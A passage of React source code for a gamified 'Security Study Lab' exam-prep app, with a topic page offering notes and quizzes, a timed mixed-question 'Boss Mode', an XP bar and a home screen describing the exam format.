          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>{topic.sections.length} sections · {topic.flashcards.length} cards · {topic.mcqs.length} MCQs</div>
        </div>
      </div>

      <div style={{background:"#0d0d0d",border:`1px solid ${topic.color}22`,borderRadius:10,padding:"12px 14px",marginBottom:20,fontFamily:"'DM Sans',sans-serif",fontSize:13,color:"#888",lineHeight:1.6}}>
        {topic.summary}
      </div>

      <div style={{display:"flex",gap:6,marginBottom:20,overflowX:"auto",paddingBottom:4}}>
        {tabs.map(t=>(
          <button key={t.id} onClick={()=>{setTab(t.id);setQuizResult(null);setQuizMode(null);}} style={{flexShrink:0,background:tab===t.id?`${topic.color}22`:"#0d0d0d",border:`1px solid ${tab===t.id?topic.color+"55":"#1e1e1e"}`,color:tab===t.id?topic.color:"#555",padding:"8px 14px",borderRadius:8,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,whiteSpace:"nowrap"}}>
            {t.icon} {t.label}
          </button>
        ))}
      </div>

      {/* NOTES TAB */}
      {tab==="notes"&&(
        <div className="fu">
          {topic.sections.map((s,i)=>(
            <div key={i} style={{background:"#0a0a0a",border:`1px solid ${expandedSection===i?topic.color+"44":"#141414"}`,borderRadius:12,marginBottom:8,overflow:"hidden",transition:"border-color 0.2s"}}>
              <button onClick={()=>setExpandedSection(expandedSection===i?-1:i)} style={{width:"100%",background:"none",border:"none",padding:"16px 18px",textAlign:"left",cursor:"pointer",display:"flex",justifyContent:"space-between",alignItems:"center"}}>
                <span style={{fontFamily:"'DM Sans',sans-serif",fontWeight:600,fontSize:14,color:expandedSection===i?topic.color:"#c0b8a8"}}>{s.title}</span>
                <span style={{color:"#333",fontSize:18,transition:"transform 0.2s",transform:expandedSection===i?"rotate(90deg)":"none"}}>›</span>
              </button>
              {expandedSection===i&&(
                <div style={{padding:"0 18px 18px"}} className="fu">
                  <p style={{fontFamily:"'DM Sans',sans-serif",fontSize:14,color:"#908880",lineHeight:1.75,marginBottom:s.code||s.keyPoints?14:0}}>{s.content}</p>
                  {s.code&&(
                    <div style={{background:"#060606",border:"1px solid #1a1a1a",borderRadius:8,padding:"14px 16px",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#7c9",lineHeight:1.7,marginBottom:s.keyPoints?12:0,overflowX:"auto",whiteSpace:"pre"}}>
                      {s.code}
                    </div>
                  )}
                  {s.keyPoints&&(
                    <ul style={{listStyle:"none",display:"flex",flexDirection:"column",gap:6}}>
                      {s.keyPoints.map((kp,j)=>(
                        <li key={j} style={{display:"flex",gap:8,alignItems:"flex-start"}}>
                          <span style={{color:topic.color,marginTop:2,flexShrink:0}}>▸</span>
                          <span style={{fontFamily:"'DM Sans',sans-serif",fontSize:13,color:"#706860",lineHeight:1.6}}>{kp}</span>
                        </li>
                      ))}
                    </ul>
                  )}
                </div>
              )}
            </div>
          ))}
        </div>
      )}

      {/* DEMO TAB */}
      {tab==="demo"&&<div className="fu">{demoMap[topic.id]||<div style={{color:"#444",fontFamily:"'IBM Plex Mono',monospace",fontSize:13,padding:20,textAlign:"center"}}>No demo for this topic</div>}</div>}

      {/* QUIZ TABS */}
      {tab==="flash"&&(quizResult?<ResultScreen {...quizResult} color={topic.color} onRetry={()=>setQuizResult(null)} onBack={()=>setTab("notes")}/>:<FlashcardQuiz cards={topic.flashcards} color={topic.color} onXp={addXp} onDone={handleDone}/>)}
      {tab==="mcq"&&(quizResult?<ResultScreen {...quizResult} color={topic.color} onRetry={()=>setQuizResult(null)} onBack={()=>setTab("notes")}/>:<McqQuiz questions={topic.mcqs} color={topic.color} onXp={addXp} onDone={handleDone}/>)}
      {tab==="fill"&&(quizResult?<ResultScreen {...quizResult} color={topic.color} onRetry={()=>setQuizResult(null)} onBack={()=>setTab("notes")}/>:<FillBlankQuiz questions={topic.fillBlanks} color={topic.color} onXp={addXp} onDone={handleDone}/>)}
    </div>
  );
};

/* ═══════════════════════════════════════════════════════════════
   BOSS MODE — FULL MIXED EXAM SIMULATION
═══════════════════════════════════════════════════════════════ */
const BossMode = ({addXp,onBack}) => {
  const allQ=useRef(shuffle(CURRICULUM.flatMap(t=>t.mcqs.map(q=>({...q,topicColor:t.color,topicTitle:t.title})))));
  const [idx,setIdx]=useState(0);
  const [sel,setSel]=useState(null);
  const [score,setScore]=useState(0);
  const [results,setResults]=useState([]);
  const [done,setDone]=useState(false);
  const [time,setTime]=useState(0);
  const timerRef=useRef(null);

  useEffect(()=>{
    timerRef.current=setInterval(()=>setTime(t=>t+1),1000);
    return()=>clearInterval(timerRef.current);
  },[]);

  const q=allQ.current[idx];

  const pick=(i)=>{
    if(sel!==null)return;
    const ok=i===q.ans;
    setSel(i);setResults(r=>[...r,ok]);
    if(ok){setScore(s=>s+1);addXp(20);}
  };
  const next=()=>{
    if(idx+1>=allQ.current.length){setDone(true);clearInterval(timerRef.current);}
    else{setIdx(i=>i+1);setSel(null);}
  };

  const mins=Math.floor(time/60),secs=time%60;
  const pct=done?Math.round(score/allQ.current.length*100):0;

  if(done) return(
    <div style={{textAlign:"center",padding:"40px 16px"}} className="pop">
      <div style={{fontSize:56,marginBottom:12}}>{pct>=80?"🏆":pct>=63?"✅":"📚"}</div>
      <div style={{fontFamily:"'DM Serif Display',serif",fontSize:38,color:"#e0d8c8",marginBottom:4}}>{score}/{allQ.current.length}</div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:13,color:"#555",marginBottom:8}}>Time: {mins}m {secs}s</div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:14,color:pct>=80?"#4ade80":pct>=63?"#fbbf24":"#f87171",marginBottom:24}}>
        {pct}% — {pct>=80?"Exam ready.":pct>=63?"You'll hit your 63.":"Keep drilling."}
      </div>
      <div style={{display:"flex",flexWrap:"wrap",gap:4,justifyContent:"center",marginBottom:24}}>
        {results.map((r,i)=><div key={i} style={{width:12,height:12,borderRadius:2,background:r?"#4ade80":"#f87171"}}/>)}
      </div>
      <button onClick={onBack} style={{background:"#111",border:"1px solid #222",color:"#888",padding:"10px 24px",borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>← Back</button>
    </div>
  );

  return(
    <div className="fu">
      <div style={{display:"flex",justifyContent:"space-between",alignItems:"center",marginBottom:16}}>
        <button onClick={()=>{clearInterval(timerRef.current);onBack();}} style={{background:"none",border:"none",color:"#444",cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:12}}>← exit</button>
        <div style={{display:"flex",gap:12,alignItems:"center"}}>
          <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#444"}}>{mins}:{secs.toString().padStart(2,"0")}</span>
          <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#444"}}>{idx+1}/{allQ.current.length}</span>
        </div>
      </div>
      <div style={{height:3,background:"#111",borderRadius:2,marginBottom:16,overflow:"hidden"}}>
        <div style={{height:"100%",width:`${(idx/allQ.current.length)*100}%`,background:"linear-gradient(90deg,#ff3b5c,#ff8c00,#c8e600,#00c8ff,#b060ff)",transition:"width 0.3s"}}/>
      </div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:q.topicColor,marginBottom:8,textTransform:"uppercase",letterSpacing:2}}>{q.topicTitle}</div>
      <div style={{background:"#0d0d0d",border:`1px solid ${q.topicColor}33`,borderRadius:12,padding:"22px 20px",marginBottom:12}}>
        <div style={{fontFamily:"'DM Serif Display',serif",fontSize:19,color:"#e0d8c8",lineHeight:1.55}}>{q.q}</div>
      </div>
      <div style={{display:"flex",flexDirection:"column",gap:7,marginBottom:10}}>
        {q.opts.map((o,i)=>{
          const rev=sel!==null,ok=i===q.ans,chosen=sel===i;
          return(
            <button key={i} onClick={()=>pick(i)} style={{background:rev&&ok?"#081a0e":rev&&chosen&&!ok?"#1a0808":"#0a0a0a",border:`1px solid ${rev&&ok?"#4ade80":rev&&chosen&&!ok?"#f87171":"#1a1a1a"}`,color:rev&&ok?"#4ade80":rev&&chosen&&!ok?"#f87171":"#a09080",padding:"12px 16px",borderRadius:10,textAlign:"left",cursor:sel===null?"pointer":"default",fontFamily:"'DM Sans',sans-serif",fontSize:14,display:"flex",alignItems:"center",gap:10,transition:"all 0.15s"}}>
              <span style={{opacity:0.4,fontFamily:"'IBM Plex Mono',monospace",fontSize:11}}>{String.fromCharCode(65+i)}</span>{o}
              {rev&&ok&&<span style={{marginLeft:"auto"}}>✓</span>}
              {rev&&chosen&&!ok&&<span style={{marginLeft:"auto"}}>✗</span>}
            </button>
          );
        })}
      </div>
      {sel!==null&&(
        <div className="fu">
          <div style={{background:"#080808",border:"1px solid #1a1a1a",borderRadius:8,padding:"10px 14px",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#555",marginBottom:10,lineHeight:1.6}}>
            💡 {q.explain}
          </div>
          <button onClick={next} style={{width:"100%",background:`${q.topicColor}18`,border:`1px solid ${q.topicColor}44`,color:q.topicColor,padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>
            {idx+1>=allQ.current.length?"Finish Exam →":"Next →"}
          </button>
        </div>
      )}
    </div>
  );
};

/* ═══════════════════════════════════════════════════════════════
   XP SYSTEM
═══════════════════════════════════════════════════════════════ */
const XpBar = ({xp,toast}) => {
  const lvl=Math.floor(xp/100)+1;
  const prog=xp%100;
  return(
    <div style={{position:"sticky",top:0,zIndex:100,background:"#060608",borderBottom:"1px solid #0e0e10",padding:"10px 16px",display:"flex",alignItems:"center",gap:10}}>
      <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:10,color:"#333",minWidth:48}}>LVL {lvl}</span>
      <div style={{flex:1,height:4,background:"#111",borderRadius:2,overflow:"hidden"}}>
        <div style={{height:"100%",width:`${prog}%`,background:"linear-gradient(90deg,#ff3b5c,#ff8c00,#c8e600)",borderRadius:2,transition:"width 0.4s ease"}}/>
      </div>
      <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:10,color:"#333",minWidth:46}}>{xp} XP</span>
      {toast&&<span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#fbbf24",animation:"xpFloat 1s ease forwards"}}>+{toast}</span>}
    </div>
  );
};

/* ═══════════════════════════════════════════════════════════════
   HOME
═══════════════════════════════════════════════════════════════ */
const Home = ({xp,onTopic,onBoss}) => {
  const total=CURRICULUM.reduce((s,t)=>s+t.flashcards.length+t.mcqs.length+t.fillBlanks.length,0);
  const totalConcepts=CURRICULUM.reduce((s,t)=>s+t.sections.length,0);

  return(
    <div className="fu">
      <div style={{marginBottom:28}}>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:10,color:"#282828",letterSpacing:4,textTransform:"uppercase",marginBottom:8}}>CS 5340 · TTU · May 12 4:30pm</div>
        <div style={{fontFamily:"'DM Serif Display',serif",fontSize:34,color:"#e0d8c8",lineHeight:1.1,marginBottom:6}}>Security<br/><em style={{color:"#555"}}>Study Lab</em></div>
        <div style={{display:"flex",gap:16}}>
          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333"}}>{totalConcepts} sections</div>
          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333"}}>{total} quiz items</div>
          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333"}}>5 live demos</div>
        </div>
      </div>

      <button onClick={onBoss} style={{width:"100%",background:"linear-gradient(135deg,#1a0010,#0a0a14)",border:"1px solid #ff3b5c55",borderRadius:14,padding:"20px 18px",textAlign:"left",cursor:"pointer",marginBottom:16,position:"relative",overflow:"hidden"}}>
        <div style={{position:"absolute",top:0,right:0,bottom:0,left:0,background:"radial-gradient(circle at 90% 50%, #ff3b5c08, transparent 60%)",pointerEvents:"none"}}/>
        <div style={{display:"flex",alignItems:"center",gap:12}}>
          <span style={{fontSize:28}}>🏆</span>
          <div>
            <div style={{fontFamily:"'DM Serif Display',serif",fontSize:18,color:"#e0d8c8",marginBottom:2}}>Boss Mode — Full Exam Sim</div>
            <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#555"}}>{CURRICULUM.reduce((s,t)=>s+t.mcqs.length,0)} questions · all topics · timed</div>
          </div>
          <div style={{marginLeft:"auto",fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#ff3b5c"}}>→</div>
        </div>
      </button>

      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:10,color:"#282828",textTransform:"uppercase",letterSpacing:3,marginBottom:10}}>Topics</div>
      <div style={{display:"flex",flexDirection:"column",gap:8}}>
        {CURRICULUM.map((t,i)=>(
          <button key={t.id} onClick={()=>onTopic(t)} style={{background:"#0a0a0c",border:"1px solid #141416",borderRadius:12,padding:"14px 16px",textAlign:"left",cursor:"pointer",display:"flex",alignItems:"center",gap:12,transition:"border-color 0.15s",animationDelay:`${i*0.06}s`}} className="fu"
            onMouseEnter={e=>e.currentTarget.style.borderColor=t.color+"44"}
            onMouseLeave={e=>e.currentTarget.style.borderColor="#141416"}>
            <div style={{width:36,height:36,borderRadius:10,background:t.bg,border:`1px solid ${t.color}33`,display:"flex",alignItems:"center",justifyContent:"center",fontSize:18,flexShrink:0}}>{t.icon}</div>
            <div style={{flex:1}}>
              <div style={{fontFamily:"'DM Sans',sans-serif",fontWeight:600,fontSize:14,color:"#d0c8b8",marginBottom:2}}>{t.title}</div>
              <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333"}}>
                {t.sections.length} sections · {t.flashcards.length} flash · {t.mcqs.length} MCQ · {t.fillBlanks.length} fill
              </div>
            </div>
            <div style={{display:"flex",flexDirection:"column",gap:3,alignItems:"flex-end"}}>
              <div style={{width:6,height:6,borderRadius:"50%",background:t.color,opacity:0.7}}/>
            </div>
          </button>
        ))}
      </div>

      <div style={{marginTop:16,background:"#080808",border:"1px solid #101010",borderRadius:10,padding:"14px 16px"}}>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:10,color:"#282828",textTransform:"uppercase",letterSpacing:3,marginBottom:10}}>Exam Format</div>
        <div style={{display:"flex",flexWrap:"wrap",gap:12,marginBottom:8}}>
          <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>15 MC × 2 = 30pts</span>
          <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>7 open × 10 = 70pts</span>
          <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>150 min · closed book</span>
        </div>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#ff3b5c"}}>⚠ Never leave open-ended questions blank — partial credit matters</div>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#4ade80",marginTop:4}}>✓ You need 63/100 for an A — that's very achievable</div>
      </div>
    </div>
  );
};

/* ═══════════════════════════════════════════════════════════════
   ROOT APP
═══════════════════════════════════════════════════════════════ */
export default function App() {
  const [view,setView]=useState("home");
  const [topic,setTopic]=useState(null);
  const [xp,setXp]=useState(0);
  const [toast,setToast]=useState(null);
  const toastRef=useRef(null);

  const addXp=useCallback((n)=>{
    if(n<=0)return;
    setXp(x=>x+n);
    clearTimeout(toastRef.current);
    setToast(n);
    toastRef.current=setTimeout(()=>setToast(null),1200);
  },[]);

  return(
    <>
      <style>{GLOBAL_CSS}</style>
      <div style={{background:"#060608",minHeight:"100vh"}}>
        <XpBar xp={xp} toast={toast}/>
        <div style={{maxWidth:560,margin:"0 auto",padding:"20px 16px 60px"}}>
          {view==="home"&&<Home xp={xp} onTopic={t=>{setTopic(t);setView("topic");}} onBoss={()=>setView("boss")}/>}
          {view==="topic"&&topic&&<TopicPage topic={topic} xp={xp} addXp={addXp} onBack={()=>setView("home")}/>}
          {view==="boss"&&<BossMode addXp={addXp} onBack={()=>setView("home")}/>}
        </div>
      </div>
    </>
  );
}